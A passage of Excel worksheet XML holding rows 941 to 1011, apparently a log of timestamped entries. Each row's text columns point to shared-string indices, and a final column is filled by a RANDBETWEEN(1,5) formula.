    <row r="941" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A941" s="1">
        <v>43542.393518518518</v>
      </c>
      <c r="B941" t="s">
        <v>13</v>
      </c>
      <c r="C941" t="s">
        <v>10</v>
      </c>
      <c r="D941" t="s">
        <v>23</v>
      </c>
      <c r="E941" t="s">
        <v>1040</v>
      </c>
      <c r="F941">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="942" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A942" s="1">
        <v>43542.388159722221</v>
      </c>
      <c r="B942" t="s">
        <v>13</v>
      </c>
      <c r="C942" t="s">
        <v>301</v>
      </c>
      <c r="E942" s="2" t="s">
        <v>1041</v>
      </c>
      <c r="F942">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="943" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A943" s="1">
        <v>43542.37840277778</v>
      </c>
      <c r="B943" t="s">
        <v>19</v>
      </c>
      <c r="C943" t="s">
        <v>41</v>
      </c>
      <c r="E943" s="2" t="s">
        <v>1032</v>
      </c>
      <c r="F943">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="944" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A944" s="1">
        <v>43542.348958333336</v>
      </c>
      <c r="B944" t="s">
        <v>19</v>
      </c>
      <c r="C944" t="s">
        <v>10</v>
      </c>
      <c r="D944" t="s">
        <v>112</v>
      </c>
      <c r="E944" t="s">
        <v>1042</v>
      </c>
      <c r="F944">
        <f t="shared" ca="1" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="945" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A945" s="1">
        <v>43542.331944444442</v>
      </c>
      <c r="B945" t="s">
        <v>19</v>
      </c>
      <c r="C945" t="s">
        <v>10</v>
      </c>
      <c r="D945" t="s">
        <v>86</v>
      </c>
      <c r="E945" s="2" t="s">
        <v>1043</v>
      </c>
      <c r="F945">
        <f t="shared" ca="1" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="946" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A946" s="1">
        <v>43542.319699074076</v>
      </c>
      <c r="B946" t="s">
        <v>5</v>
      </c>
      <c r="C946" t="s">
        <v>48</v>
      </c>
      <c r="E946" s="2" t="s">
        <v>1044</v>
      </c>
      <c r="F946">
        <f t="shared" ca="1" si="14"/>
        <v>4</v>
      </c>
    </row>
    <row r="947" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A947" s="1">
        <v>43542.31962962963</v>
      </c>
      <c r="B947" t="s">
        <v>19</v>
      </c>
      <c r="C947" t="s">
        <v>10</v>
      </c>
      <c r="D947" t="s">
        <v>80</v>
      </c>
      <c r="E947" t="s">
        <v>1045</v>
      </c>
      <c r="F947">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="948" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A948" s="1">
        <v>43542.298368055555</v>
      </c>
      <c r="B948" t="s">
        <v>5</v>
      </c>
      <c r="C948" t="s">
        <v>41</v>
      </c>
      <c r="E948" t="s">
        <v>1046</v>
      </c>
      <c r="F948">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="949" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A949" s="1">
        <v>43542.296875</v>
      </c>
      <c r="B949" t="s">
        <v>13</v>
      </c>
      <c r="C949" t="s">
        <v>41</v>
      </c>
      <c r="E949" s="2" t="s">
        <v>1047</v>
      </c>
      <c r="F949">
        <f t="shared" ca="1" si="14"/>
        <v>4</v>
      </c>
    </row>
    <row r="950" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A950" s="1">
        <v>43542.259050925924</v>
      </c>
      <c r="B950" t="s">
        <v>5</v>
      </c>
      <c r="C950" t="s">
        <v>10</v>
      </c>
      <c r="D950" t="s">
        <v>6</v>
      </c>
      <c r="E950" s="2" t="s">
        <v>1048</v>
      </c>
      <c r="F950">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="951" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A951" s="1">
        <v>43542.248553240737</v>
      </c>
      <c r="B951" t="s">
        <v>19</v>
      </c>
      <c r="C951" t="s">
        <v>344</v>
      </c>
      <c r="E951" s="2" t="s">
        <v>1049</v>
      </c>
      <c r="F951">
        <f t="shared" ca="1" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="952" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A952" s="1">
        <v>43542.230324074073</v>
      </c>
      <c r="B952" t="s">
        <v>35</v>
      </c>
      <c r="C952" t="s">
        <v>1050</v>
      </c>
      <c r="E952" s="2" t="s">
        <v>1051</v>
      </c>
      <c r="F952">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="953" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A953" s="1">
        <v>43542.227326388886</v>
      </c>
      <c r="B953" t="s">
        <v>5</v>
      </c>
      <c r="C953" t="s">
        <v>731</v>
      </c>
      <c r="E953" s="2" t="s">
        <v>1052</v>
      </c>
      <c r="F953">
        <f t="shared" ca="1" si="14"/>
        <v>2</v>
      </c>
    </row>
    <row r="954" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A954" s="1">
        <v>43542.223923611113</v>
      </c>
      <c r="B954" t="s">
        <v>19</v>
      </c>
      <c r="C954" t="s">
        <v>634</v>
      </c>
      <c r="E954" s="2" t="s">
        <v>1053</v>
      </c>
      <c r="F954">
        <f t="shared" ca="1" si="14"/>
        <v>4</v>
      </c>
    </row>
    <row r="955" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A955" s="1">
        <v>43542.206782407404</v>
      </c>
      <c r="B955" t="s">
        <v>19</v>
      </c>
      <c r="C955" t="s">
        <v>73</v>
      </c>
      <c r="E955" t="s">
        <v>1054</v>
      </c>
      <c r="F955">
        <f t="shared" ca="1" si="14"/>
        <v>4</v>
      </c>
    </row>
    <row r="956" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A956" s="1">
        <v>43542.197835648149</v>
      </c>
      <c r="B956" t="s">
        <v>35</v>
      </c>
      <c r="C956" t="s">
        <v>41</v>
      </c>
      <c r="E956" s="2" t="s">
        <v>1055</v>
      </c>
      <c r="F956">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="957" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A957" s="1">
        <v>43542.189270833333</v>
      </c>
      <c r="B957" t="s">
        <v>19</v>
      </c>
      <c r="C957" t="s">
        <v>1056</v>
      </c>
      <c r="E957" s="2" t="s">
        <v>1057</v>
      </c>
      <c r="F957">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="958" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A958" s="1">
        <v>43542.146585648145</v>
      </c>
      <c r="B958" t="s">
        <v>5</v>
      </c>
      <c r="C958" t="s">
        <v>60</v>
      </c>
      <c r="E958" t="s">
        <v>1058</v>
      </c>
      <c r="F958">
        <f t="shared" ca="1" si="14"/>
        <v>1</v>
      </c>
    </row>
    <row r="959" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A959" s="1">
        <v>43542.089872685188</v>
      </c>
      <c r="B959" t="s">
        <v>5</v>
      </c>
      <c r="C959" t="s">
        <v>41</v>
      </c>
      <c r="E959" t="s">
        <v>1059</v>
      </c>
      <c r="F959">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="960" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A960" s="1">
        <v>43542.080046296294</v>
      </c>
      <c r="B960" t="s">
        <v>22</v>
      </c>
      <c r="C960" t="s">
        <v>318</v>
      </c>
      <c r="E960" t="s">
        <v>1060</v>
      </c>
      <c r="F960">
        <f t="shared" ca="1" si="14"/>
        <v>5</v>
      </c>
    </row>
    <row r="961" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A961" s="1">
        <v>43542.070798611108</v>
      </c>
      <c r="B961" t="s">
        <v>19</v>
      </c>
      <c r="C961" t="s">
        <v>408</v>
      </c>
      <c r="E961" s="2" t="s">
        <v>1061</v>
      </c>
      <c r="F961">
        <f t="shared" ca="1" si="14"/>
        <v>4</v>
      </c>
    </row>
    <row r="962" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A962" s="1">
        <v>43542.003194444442</v>
      </c>
      <c r="B962" t="s">
        <v>5</v>
      </c>
      <c r="C962" t="s">
        <v>41</v>
      </c>
      <c r="E962" t="s">
        <v>1062</v>
      </c>
      <c r="F962">
        <f t="shared" ref="F962:F1025" ca="1" si="15">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="963" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A963" s="1">
        <v>43541.989224537036</v>
      </c>
      <c r="B963" t="s">
        <v>5</v>
      </c>
      <c r="C963" t="s">
        <v>41</v>
      </c>
      <c r="E963" s="2" t="s">
        <v>1063</v>
      </c>
      <c r="F963">
        <f t="shared" ca="1" si="15"/>
        <v>1</v>
      </c>
    </row>
    <row r="964" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A964" s="1">
        <v>43541.968877314815</v>
      </c>
      <c r="B964" t="s">
        <v>5</v>
      </c>
      <c r="C964" t="s">
        <v>1064</v>
      </c>
      <c r="E964" s="2" t="s">
        <v>1065</v>
      </c>
      <c r="F964">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="965" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A965" s="1">
        <v>43541.959502314814</v>
      </c>
      <c r="B965" t="s">
        <v>35</v>
      </c>
      <c r="C965" t="s">
        <v>41</v>
      </c>
      <c r="E965" s="2" t="s">
        <v>1066</v>
      </c>
      <c r="F965">
        <f t="shared" ca="1" si="15"/>
        <v>4</v>
      </c>
    </row>
    <row r="966" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A966" s="1">
        <v>43541.838252314818</v>
      </c>
      <c r="B966" t="s">
        <v>19</v>
      </c>
      <c r="C966" t="s">
        <v>140</v>
      </c>
      <c r="D966" t="s">
        <v>141</v>
      </c>
      <c r="E966" s="2" t="s">
        <v>1067</v>
      </c>
      <c r="F966">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="967" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A967" s="1">
        <v>43541.729895833334</v>
      </c>
      <c r="B967" t="s">
        <v>9</v>
      </c>
      <c r="C967" t="s">
        <v>10</v>
      </c>
      <c r="D967" t="s">
        <v>41</v>
      </c>
      <c r="E967" t="s">
        <v>1069</v>
      </c>
      <c r="F967">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="968" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A968" s="1">
        <v>43541.654548611114</v>
      </c>
      <c r="B968" t="s">
        <v>19</v>
      </c>
      <c r="C968" t="s">
        <v>10</v>
      </c>
      <c r="D968" t="s">
        <v>52</v>
      </c>
      <c r="E968" s="2" t="s">
        <v>1070</v>
      </c>
      <c r="F968">
        <f t="shared" ca="1" si="15"/>
        <v>5</v>
      </c>
    </row>
    <row r="969" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A969" s="1">
        <v>43541.612002314818</v>
      </c>
      <c r="B969" t="s">
        <v>5</v>
      </c>
      <c r="C969" t="s">
        <v>71</v>
      </c>
      <c r="E969" s="2" t="s">
        <v>1071</v>
      </c>
      <c r="F969">
        <f t="shared" ca="1" si="15"/>
        <v>4</v>
      </c>
    </row>
    <row r="970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A970" s="1">
        <v>43541.430046296293</v>
      </c>
      <c r="B970" t="s">
        <v>13</v>
      </c>
      <c r="C970" t="s">
        <v>10</v>
      </c>
      <c r="D970" t="s">
        <v>41</v>
      </c>
      <c r="E970" t="s">
        <v>1072</v>
      </c>
      <c r="F970">
        <f t="shared" ca="1" si="15"/>
        <v>5</v>
      </c>
    </row>
    <row r="971" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A971" s="1">
        <v>43541.109965277778</v>
      </c>
      <c r="B971" t="s">
        <v>35</v>
      </c>
      <c r="C971" t="s">
        <v>318</v>
      </c>
      <c r="E971" s="2" t="s">
        <v>1073</v>
      </c>
      <c r="F971">
        <f t="shared" ca="1" si="15"/>
        <v>4</v>
      </c>
    </row>
    <row r="972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A972" s="1">
        <v>43540.98946759259</v>
      </c>
      <c r="B972" t="s">
        <v>19</v>
      </c>
      <c r="C972" t="s">
        <v>260</v>
      </c>
      <c r="E972" t="s">
        <v>1074</v>
      </c>
      <c r="F972">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="973" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A973" s="1">
        <v>43540.857858796298</v>
      </c>
      <c r="B973" t="s">
        <v>19</v>
      </c>
      <c r="C973" t="s">
        <v>10</v>
      </c>
      <c r="D973" t="s">
        <v>192</v>
      </c>
      <c r="E973" s="2" t="s">
        <v>1075</v>
      </c>
      <c r="F973">
        <f t="shared" ca="1" si="15"/>
        <v>1</v>
      </c>
    </row>
    <row r="974" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A974" s="1">
        <v>43540.817118055558</v>
      </c>
      <c r="B974" t="s">
        <v>5</v>
      </c>
      <c r="C974" t="s">
        <v>535</v>
      </c>
      <c r="E974" s="2" t="s">
        <v>1076</v>
      </c>
      <c r="F974">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="975" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A975" s="1">
        <v>43540.696412037039</v>
      </c>
      <c r="B975" t="s">
        <v>5</v>
      </c>
      <c r="C975" t="s">
        <v>1077</v>
      </c>
      <c r="D975" t="s">
        <v>33</v>
      </c>
      <c r="E975" t="s">
        <v>1078</v>
      </c>
      <c r="F975">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="976" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A976" s="1">
        <v>43540.432870370372</v>
      </c>
      <c r="B976" t="s">
        <v>9</v>
      </c>
      <c r="C976" t="s">
        <v>10</v>
      </c>
      <c r="D976" t="s">
        <v>107</v>
      </c>
      <c r="E976" s="2" t="s">
        <v>1079</v>
      </c>
      <c r="F976">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="977" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A977" s="1">
        <v>43540.399571759262</v>
      </c>
      <c r="B977" t="s">
        <v>13</v>
      </c>
      <c r="C977" t="s">
        <v>1080</v>
      </c>
      <c r="E977" s="2" t="s">
        <v>1081</v>
      </c>
      <c r="F977">
        <f t="shared" ca="1" si="15"/>
        <v>4</v>
      </c>
    </row>
    <row r="978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A978" s="1">
        <v>43540.352939814817</v>
      </c>
      <c r="B978" t="s">
        <v>13</v>
      </c>
      <c r="C978" t="s">
        <v>41</v>
      </c>
      <c r="E978" t="s">
        <v>1082</v>
      </c>
      <c r="F978">
        <f t="shared" ca="1" si="15"/>
        <v>1</v>
      </c>
    </row>
    <row r="979" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A979" s="1">
        <v>43540.346712962964</v>
      </c>
      <c r="B979" t="s">
        <v>9</v>
      </c>
      <c r="C979" t="s">
        <v>1050</v>
      </c>
      <c r="F979">
        <f t="shared" ca="1" si="15"/>
        <v>1</v>
      </c>
    </row>
    <row r="980" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A980" s="1">
        <v>43540.326689814814</v>
      </c>
      <c r="B980" t="s">
        <v>9</v>
      </c>
      <c r="C980" t="s">
        <v>318</v>
      </c>
      <c r="E980" t="s">
        <v>1083</v>
      </c>
      <c r="F980">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A981" s="1">
        <v>43539.989328703705</v>
      </c>
      <c r="B981" t="s">
        <v>35</v>
      </c>
      <c r="C981" t="s">
        <v>10</v>
      </c>
      <c r="D981" t="s">
        <v>290</v>
      </c>
      <c r="F981">
        <f t="shared" ca="1" si="15"/>
        <v>4</v>
      </c>
    </row>
    <row r="982" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A982" s="1">
        <v>43539.798194444447</v>
      </c>
      <c r="B982" t="s">
        <v>22</v>
      </c>
      <c r="C982" t="s">
        <v>10</v>
      </c>
      <c r="D982" t="s">
        <v>46</v>
      </c>
      <c r="E982" s="2" t="s">
        <v>1084</v>
      </c>
      <c r="F982">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A983" s="1">
        <v>43539.784375000003</v>
      </c>
      <c r="B983" t="s">
        <v>19</v>
      </c>
      <c r="C983" t="s">
        <v>10</v>
      </c>
      <c r="D983" t="s">
        <v>36</v>
      </c>
      <c r="E983" t="s">
        <v>1085</v>
      </c>
      <c r="F983">
        <f t="shared" ca="1" si="15"/>
        <v>1</v>
      </c>
    </row>
    <row r="984" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A984" s="1">
        <v>43539.773043981484</v>
      </c>
      <c r="B984" t="s">
        <v>13</v>
      </c>
      <c r="C984" t="s">
        <v>10</v>
      </c>
      <c r="D984" t="s">
        <v>6</v>
      </c>
      <c r="E984" s="2" t="s">
        <v>1086</v>
      </c>
      <c r="F984">
        <f t="shared" ca="1" si="15"/>
        <v>4</v>
      </c>
    </row>
    <row r="985" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A985" s="1">
        <v>43539.769907407404</v>
      </c>
      <c r="B985" t="s">
        <v>19</v>
      </c>
      <c r="C985" t="s">
        <v>10</v>
      </c>
      <c r="D985" t="s">
        <v>94</v>
      </c>
      <c r="E985" t="s">
        <v>1087</v>
      </c>
      <c r="F985">
        <f t="shared" ca="1" si="15"/>
        <v>5</v>
      </c>
    </row>
    <row r="986" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A986" s="1">
        <v>43539.765405092592</v>
      </c>
      <c r="B986" t="s">
        <v>19</v>
      </c>
      <c r="C986" t="s">
        <v>10</v>
      </c>
      <c r="D986" t="s">
        <v>17</v>
      </c>
      <c r="E986" t="s">
        <v>1088</v>
      </c>
      <c r="F986">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="987" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A987" s="1">
        <v>43539.691018518519</v>
      </c>
      <c r="B987" t="s">
        <v>19</v>
      </c>
      <c r="C987" t="s">
        <v>10</v>
      </c>
      <c r="D987" t="s">
        <v>178</v>
      </c>
      <c r="E987" s="2" t="s">
        <v>1089</v>
      </c>
      <c r="F987">
        <f t="shared" ca="1" si="15"/>
        <v>5</v>
      </c>
    </row>
    <row r="988" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A988" s="1">
        <v>43539.6875</v>
      </c>
      <c r="B988" t="s">
        <v>5</v>
      </c>
      <c r="C988" t="s">
        <v>10</v>
      </c>
      <c r="E988" s="2" t="s">
        <v>1090</v>
      </c>
      <c r="F988">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="989" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A989" s="1">
        <v>43539.680833333332</v>
      </c>
      <c r="B989" t="s">
        <v>13</v>
      </c>
      <c r="C989" t="s">
        <v>10</v>
      </c>
      <c r="D989" t="s">
        <v>1091</v>
      </c>
      <c r="E989" t="s">
        <v>1092</v>
      </c>
      <c r="F989">
        <f t="shared" ca="1" si="15"/>
        <v>4</v>
      </c>
    </row>
    <row r="990" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A990" s="1">
        <v>43539.673263888886</v>
      </c>
      <c r="B990" t="s">
        <v>19</v>
      </c>
      <c r="C990" t="s">
        <v>10</v>
      </c>
      <c r="D990" t="s">
        <v>6</v>
      </c>
      <c r="E990" t="s">
        <v>1093</v>
      </c>
      <c r="F990">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="991" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A991" s="1">
        <v>43539.645486111112</v>
      </c>
      <c r="B991" t="s">
        <v>5</v>
      </c>
      <c r="C991" t="s">
        <v>10</v>
      </c>
      <c r="D991" t="s">
        <v>6</v>
      </c>
      <c r="E991" s="2" t="s">
        <v>1094</v>
      </c>
      <c r="F991">
        <f t="shared" ca="1" si="15"/>
        <v>5</v>
      </c>
    </row>
    <row r="992" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A992" s="1">
        <v>43539.628784722219</v>
      </c>
      <c r="B992" t="s">
        <v>19</v>
      </c>
      <c r="C992" t="s">
        <v>10</v>
      </c>
      <c r="D992" t="s">
        <v>112</v>
      </c>
      <c r="E992" s="2" t="s">
        <v>1095</v>
      </c>
      <c r="F992">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="993" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A993" s="1">
        <v>43539.628564814811</v>
      </c>
      <c r="B993" t="s">
        <v>19</v>
      </c>
      <c r="C993" t="s">
        <v>10</v>
      </c>
      <c r="D993" t="s">
        <v>6</v>
      </c>
      <c r="E993" s="2" t="s">
        <v>1096</v>
      </c>
      <c r="F993">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="994" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A994" s="1">
        <v>43539.603622685187</v>
      </c>
      <c r="B994" t="s">
        <v>5</v>
      </c>
      <c r="C994" t="s">
        <v>10</v>
      </c>
      <c r="D994" t="s">
        <v>52</v>
      </c>
      <c r="E994" t="s">
        <v>1097</v>
      </c>
      <c r="F994">
        <f t="shared" ca="1" si="15"/>
        <v>5</v>
      </c>
    </row>
    <row r="995" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A995" s="1">
        <v>43539.596331018518</v>
      </c>
      <c r="B995" t="s">
        <v>13</v>
      </c>
      <c r="C995" t="s">
        <v>10</v>
      </c>
      <c r="D995" t="s">
        <v>263</v>
      </c>
      <c r="E995" t="s">
        <v>1098</v>
      </c>
      <c r="F995">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="996" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A996" s="1">
        <v>43539.596250000002</v>
      </c>
      <c r="B996" t="s">
        <v>5</v>
      </c>
      <c r="C996" t="s">
        <v>10</v>
      </c>
      <c r="D996" t="s">
        <v>36</v>
      </c>
      <c r="E996" t="s">
        <v>1099</v>
      </c>
      <c r="F996">
        <f t="shared" ca="1" si="15"/>
        <v>5</v>
      </c>
    </row>
    <row r="997" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A997" s="1">
        <v>43539.548530092594</v>
      </c>
      <c r="B997" t="s">
        <v>13</v>
      </c>
      <c r="C997" t="s">
        <v>280</v>
      </c>
      <c r="E997" s="2" t="s">
        <v>1100</v>
      </c>
      <c r="F997">
        <f t="shared" ca="1" si="15"/>
        <v>5</v>
      </c>
    </row>
    <row r="998" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A998" s="1">
        <v>43539.530914351853</v>
      </c>
      <c r="B998" t="s">
        <v>13</v>
      </c>
      <c r="C998" t="s">
        <v>10</v>
      </c>
      <c r="D998" t="s">
        <v>6</v>
      </c>
      <c r="E998" t="s">
        <v>1101</v>
      </c>
      <c r="F998">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="999" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A999" s="1">
        <v>43539.518611111111</v>
      </c>
      <c r="B999" t="s">
        <v>19</v>
      </c>
      <c r="C999" t="s">
        <v>10</v>
      </c>
      <c r="D999" t="s">
        <v>6</v>
      </c>
      <c r="E999" s="2" t="s">
        <v>1102</v>
      </c>
      <c r="F999">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="1000" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1000" s="1">
        <v>43539.508321759262</v>
      </c>
      <c r="B1000" t="s">
        <v>13</v>
      </c>
      <c r="C1000" t="s">
        <v>10</v>
      </c>
      <c r="D1000" t="s">
        <v>222</v>
      </c>
      <c r="E1000" t="s">
        <v>1103</v>
      </c>
      <c r="F1000">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="1001" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A1001" s="1">
        <v>43539.503379629627</v>
      </c>
      <c r="B1001" t="s">
        <v>35</v>
      </c>
      <c r="C1001" t="s">
        <v>48</v>
      </c>
      <c r="E1001" s="2" t="s">
        <v>1104</v>
      </c>
      <c r="F1001">
        <f t="shared" ca="1" si="15"/>
        <v>4</v>
      </c>
    </row>
    <row r="1002" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1002" s="1">
        <v>43539.501689814817</v>
      </c>
      <c r="B1002" t="s">
        <v>5</v>
      </c>
      <c r="C1002" t="s">
        <v>10</v>
      </c>
      <c r="D1002" t="s">
        <v>112</v>
      </c>
      <c r="E1002" t="s">
        <v>1105</v>
      </c>
      <c r="F1002">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="1003" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1003" s="1">
        <v>43539.493657407409</v>
      </c>
      <c r="B1003" t="s">
        <v>19</v>
      </c>
      <c r="C1003" t="s">
        <v>10</v>
      </c>
      <c r="D1003" t="s">
        <v>271</v>
      </c>
      <c r="E1003" t="s">
        <v>1106</v>
      </c>
      <c r="F1003">
        <f t="shared" ca="1" si="15"/>
        <v>1</v>
      </c>
    </row>
    <row r="1004" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1004" s="1">
        <v>43539.489270833335</v>
      </c>
      <c r="B1004" t="s">
        <v>19</v>
      </c>
      <c r="C1004" t="s">
        <v>6</v>
      </c>
      <c r="D1004" t="s">
        <v>25</v>
      </c>
      <c r="E1004" t="s">
        <v>1107</v>
      </c>
      <c r="F1004">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="1005" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1005" s="1">
        <v>43539.482870370368</v>
      </c>
      <c r="B1005" t="s">
        <v>13</v>
      </c>
      <c r="C1005" t="s">
        <v>10</v>
      </c>
      <c r="D1005" t="s">
        <v>36</v>
      </c>
      <c r="E1005" t="s">
        <v>1108</v>
      </c>
      <c r="F1005">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="1006" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A1006" s="1">
        <v>43539.473634259259</v>
      </c>
      <c r="B1006" t="s">
        <v>19</v>
      </c>
      <c r="C1006" t="s">
        <v>10</v>
      </c>
      <c r="D1006" t="s">
        <v>6</v>
      </c>
      <c r="E1006" s="2" t="s">
        <v>1109</v>
      </c>
      <c r="F1006">
        <f t="shared" ca="1" si="15"/>
        <v>3</v>
      </c>
    </row>
    <row r="1007" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1007" s="1">
        <v>43539.458483796298</v>
      </c>
      <c r="B1007" t="s">
        <v>5</v>
      </c>
      <c r="C1007" t="s">
        <v>67</v>
      </c>
      <c r="E1007" t="s">
        <v>1110</v>
      </c>
      <c r="F1007">
        <f t="shared" ca="1" si="15"/>
        <v>5</v>
      </c>
    </row>
    <row r="1008" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1008" s="1">
        <v>43539.458449074074</v>
      </c>
      <c r="B1008" t="s">
        <v>5</v>
      </c>
      <c r="C1008" t="s">
        <v>67</v>
      </c>
      <c r="E1008" t="s">
        <v>1110</v>
      </c>
      <c r="F1008">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="1009" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1009" s="1">
        <v>43539.455312500002</v>
      </c>
      <c r="B1009" t="s">
        <v>19</v>
      </c>
      <c r="C1009" t="s">
        <v>41</v>
      </c>
      <c r="E1009" t="s">
        <v>1111</v>
      </c>
      <c r="F1009">
        <f t="shared" ca="1" si="15"/>
        <v>4</v>
      </c>
    </row>
    <row r="1010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1010" s="1">
        <v>43539.454953703702</v>
      </c>
      <c r="B1010" t="s">
        <v>5</v>
      </c>
      <c r="C1010" t="s">
        <v>10</v>
      </c>
      <c r="D1010" t="s">
        <v>993</v>
      </c>
      <c r="E1010" t="s">
        <v>1112</v>
      </c>
      <c r="F1010">
        <f t="shared" ca="1" si="15"/>
        <v>2</v>
      </c>
    </row>
    <row r="1011" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A1011" s="1">
        <v>43539.453715277778</v>
      </c>
      <c r="B1011" t="s">
        <v>5</v>
      </c>
      <c r="C1011" t="s">
        <v>41</v>
      </c>
      <c r="E1011" t="s">
        <v>1113</v>
      </c>
